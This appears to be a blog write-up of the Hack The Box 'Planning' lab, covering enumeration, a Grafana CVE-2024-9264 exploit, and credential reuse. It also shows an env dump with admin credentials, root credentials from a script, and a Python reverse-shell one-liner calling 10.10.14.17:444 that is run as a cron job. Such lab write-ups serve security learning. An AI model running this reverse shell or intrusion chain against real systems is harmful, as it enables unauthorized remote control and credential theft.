HTB-Planning Writeup

Shreyas D RShreyas D R
2 min read

Enumeration:

Webpage:

I used a top 10000 wordlist with ffuf.

I obtained a grafana page with htb.

I added this to my /etc/hosts

After checking the version I found CVE-2024-9264

Now executing the exploit:

Make sure to keep the netcat running on a different terminal:

I got the reverse shell where env revealed passwords and the user to me:


root@7ce659d667d7:~# env
env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
root@7ce659d667d7:~# clear     
clear
TERM environment variable not set.

We got creds:

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo

Now time to ssh into enzo:

I found the user flag on home itself :

Now I started searching around and found absolutely nothing partly because my stupid ass forgot to search ‘/’ .

I spent a lot of time here for absolutely no reason.

Now we note that there is a docker running that runs cleanup.sh for a set interval and we note the creds:

The creds we got here were :

root
P4ssw0rdS0pRi0T3c

Now I needed to figure out how to use the creds so i started searching running services.

Then I noticed port 8000 being active so I forwarded it to make it viewable through my browser :

tcp 127.0.0.1:8000 0.0.0.0:* LISTEN -
then 
ssh enzo@planning.htb -L 8000:127.0.0.1:8000

So in my localhost8000 , I found after entering the creds we got earlier :

It is easy to figure out from here ,since all I need to do is set up a reverse shell somehow .

Then it was all about creating a shell again so I created a python payload to give us a shell that can be pasted as a job.

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.17',444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

Then I pasted it as a command in thejob :

Now again i set up a netcat listening at 444 where I finally got the shell.

Then of course the root flag was present in the home directory .

We got the flag yayyy!!!

I rate the difficulty a 7/10 since it took me 5 days to figure out ( I was busy too lol, but I did invest proper time into this so Im satisfied)

As usual see you guy in the next one . Take Care!!!

0
Subscribe to my newsletter

Read articles from Shreyas D R directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#HackTheBox

Written by

Shreyas D R
Shreyas D R